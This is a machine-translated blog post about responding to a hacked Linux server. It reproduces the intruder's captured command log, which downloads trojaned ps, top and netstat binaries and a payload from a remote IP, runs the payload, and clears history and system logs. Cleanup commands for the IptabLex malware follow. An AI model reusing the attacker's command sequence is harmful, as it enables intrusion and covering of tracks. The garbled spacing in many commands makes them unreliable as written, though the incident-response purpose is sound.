Linux hosts are hacked and simple to process

Last Update:2015-10-09 Source: Internet

Author: User

Tags syslog

Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more ＞

Below is the process of a public network host being hacked

(The following records are fetched through the Prompt_command system environment variable)

Nov 03:24:32 * * *: [euid=root]::[/root]#

Nov 03:24:34 * * *: [euid=root]::[/root]# history

Nov 03:26:52 * * *: [euid=root]::[/root]# wget http://222.186.31.229:52636/libproc-3.2.5.so

Nov 03:26:55 * * *: [euid=root]::[/root]# wget Http://222.186.31.229:52636/ps

Nov 03:26:57 * * *: [euid=root]::[/root]# wget Http://222.186.31.229:52636/top

Nov 03:27:00 * * *: [euid=root]::[/root]# wget Http://222.186.31.229:52636/netstat

Nov 03:27:03 * * *: [euid=root]::[/root]# chmod 777 PS

Nov 03:27:05 * * *: [euid=root]::[/root]# chmod 777 Top

Nov 03:27:08 * * *: [euid=root]::[/root]# chmod 777 Netstat

Nov 03:27:11 * * *: [euid=root]::[/root]# CP libproc-3.2.5.so/usr/lib64

Nov 03:27:14 * * *: [euid=root]::[/root]# rm-f/bin/ps

Nov 03:27:16 * * *: [euid=root]::[/root]# rm-f/usr/bin/top

Nov 03:27:19 * * *: [euid=root]::[/root]# rm-f/bin/netstat

Nov 03:27:21 * * *: [euid=root]::[/root]# CP Top/usr/bin

Nov 03:27:24 * * *: [euid=root]::[/root]# CP Ps/bin

Nov 03:27:29 * * *: [euid=root]::[/root]# CP Netstat/bin

Nov 03:27:33 * * *: [euid=root]::[/root]# Ps-ef

Nov 03:27:35 * * *: [euid=root]::[/root]# Top

Nov 03:27:38 * * *: [euid=root]::[/root]# NETSTAT-ANP

Nov 03:27:40 * * *: [euid=root]::[/root]# Netstat-an

Nov 03:27:50 * * *: [euid=root]::[/root]# wget http://222.186.31.229:52636/Internet

Nov 03:27:52 * * *: [euid=root]::[/root]# chmod 0755/root/internet

Nov 03:27:56 * * *: [euid=root]::[/root]# nohup/root/internet >/dev/null 2>&1 &

Nov 03:27:57 * *: [euid=root]::[/root]# ls

Nov 03:28:01 * *: [euid=root]::[/root]# rm-rf Internet

Nov 03:28:03 * * *: [euid=root]::[/root]# RM-RF PS

Nov 03:28:05 * *: [euid=root]::[/root]# RM-RF Top

Nov 03:28:08 * * *: [euid=root]::[/root]# rm-rf libproc-3.2.5.so

Nov 03:28:10 * * *: [euid=root]::[/root]# rm-rf netstat

Nov 03:28:10 * *: [euid=root]::[/root]# ls

Nov 03:28:14 * * *: [euid=root]::[/root]# rm-rf fake.cfg

Nov 03:28:15 * *: [euid=root]::[/root]# ls

Nov 03:28:21 * * *: [euid=root]::[/root]# rm-rf. bash_history

Nov 03:28:23 * * *: [euid=root]::[/root]#

Nov 03:28:24 * * *: [euid=root]::[/root]# history

Nov 03:28:30 * * *: [euid=root]::[/root]# rm-rf/root/.bash_history

Nov 03:28:30 * * *: [euid=root]::[/root]#

Nov 03:28:30 * * *: [euid=root]::[/root]# Echo>/var/log/syslog

Nov 03:28:30 * * *: [euid=root]::[/root]# echo>/var/log/messages

Nov 03:28:30 * * *: [euid=root]::[/root]# Echo>/var/log/httpd/access_log

Nov 03:28:30 * * *: [euid=root]::[/root]# Echo>/var/log/httpd/error_log

Nov 03:28:30 * * *: [euid=root]::[/root]# Echo>/var/log/xferlog

Nov 03:28:30 * * *: [euid=root]::[/root]# echo>/var/log/secure

Nov 03:28:30 * * *: [euid=root]::[/root]# Echo>/var/log/auth.log

Nov 03:28:30 * * *: [euid=root]::[/root]# Echo>/var/log/user.log

Nov 03:28:30 * * *: [euid=root]::[/root]# echo>/var/log/wtmp

Nov 03:28:30 * * *: [euid=root]::[/root]# Echo>/var/log/lastlog

Nov 03:28:30 * * *: [euid=root]::[/root]# echo>/var/log/btmp

Nov 03:28:30 * * *: [euid=root]::[/root]# echo>/var/run/utmp

Nov 03:28:31 * * *: [euid=root]::[/root]# rm-rf/root/.bash_history

Nov 03:28:31 * * *: [euid=root]::[/root]#

Nov 03:28:31 * * *: [euid=root]::[/root]# Echo>/var/log/syslog

Nov 03:28:31 * * *: [euid=root]::[/root]# echo>/var/log/messages

Nov 03:28:31 * * *: [euid=root]::[/root]# Echo>/var/log/httpd/access_log

Nov 03:28:31 * * *: [euid=root]::[/root]# Echo>/var/log/httpd/error_log

Nov 03:28:31 * * *: [euid=root]::[/root]# Echo>/var/log/xferlog

Nov 03:28:31 * * *: [euid=root]::[/root]# echo>/var/log/secure

Nov 03:28:31 * * *: [euid=root]::[/root]# Echo>/var/log/auth.log

Nov 03:28:31 * * *: [euid=root]::[/root]# Echo>/var/log/user.log

Nov 03:28:31 * * *: [euid=root]::[/root]# echo>/var/log/wtmp

Nov 03:28:31 * * *: [euid=root]::[/root]# Echo>/var/log/lastlog

Nov 03:28:31 * * *: [euid=root]::[/root]# echo>/var/log/btmp

Nov 03:28:31 * * *: [euid=root]::[/root]# echo>/var/run/utmp

Nov 03:28:37 * * *: [euid=root]::[/root]# rm-rf. bash_history

Nov 03:28:39 * * *: [euid=root]::[/root]#

Nov 03:28:40 * * *: [euid=root]::[/root]# history

The phenomenon after the middle recruit:

1, the host contract seriously, blocking the network.

2, the exception process directly after the kill will automatically generate a new process again.

3, some abnormal process is a random name, kill after the name will change

4, the exception process port number is random port

The process of exception is a variant of IptabLex, and the process is similar:

then check the source, there are several documents:
/boot/iptables
/boot/iptablex
/boot/. IptabLes
/boot/. IptabLex

# Cat/boot/iptablex
#!/bin/sh
/boot/. IptabLex
Exit 0

# Cat/boot/iptables
#!/bin/sh
/boot/. IptabLes
Exit 0

. IptabLes and. IptabLes file, it's possible that you have binary files

Killall-9 SCC

Killall-9. IptabLes

Killall-9. IptabLex

Killall-9 profile; Killall-9 Profileh;

Killall-9 Install; Killall-9 Installh;

Killall-9 Office; Killall-9 Officeh;

Killall-9 history

Killall-9 node

Rm-f/boot/*iptables

Rm-f/boot/*iptablex

Rm-f/boot/. IptabLes

Rm-f/etc/rc.d/iptablex

Rm-f/etc/rc.d/rc2.d/*iptablex

Rm-f/etc/rc.d/rc2.d/*iptables

Rm-f/etc/rc.d/rc3.d/*iptablex

Rm-f/etc/rc.d/rc3.d/*iptables

Rm-f/etc/rc.d/rc4.d/*iptablex

Rm-f/etc/rc.d/rc4.d/*iptables

Rm-f/etc/rc.d/rc5.d/*iptablex

Rm-f/etc/rc.d/rc5.d/*iptables

Rm-f/etc/rc.d/iptables

Rm-f/usr/. IptabLes

Rm-f/usr/. IptabLex

Rm-f/etc/rc.d/init.d/iptable*

and the replaced system command is repaired.

The above processing can basically solve the problem.

There is a tricky situation where a malicious program generates a bunch of process names similar to a system process:

Pwd

Ps-ef

Netstat-an

For such malicious processes, the kill is not completely erased.

You need to clear the/lib/libgcc* library file to prevent the malicious program from starting again.

1. Clear the/etc/crontab in the Udev , while clearing the/etc/cron.hourly udev.sh

2.netstat-enlp|more

The exception port and process in the kill process, sometimes TCP sometimes has UDP, process name shape such as Netstatps , and so on, clean up the next step

3.rm-rf/lib/libgcc*

4. View netstat-anlp NETSTAT-ENLP no exception process and port open

This article from "Cexpert" blog, reproduced please contact the author!

Linux hosts are hacked and simple to process

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

Sales Support

1 on 1 presale consultation

Chat Contact Sales
After-Sales Support

24/7 Technical Support 6 Free Tickets per Quarter Faster Response

Open a Ticket
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

Learn More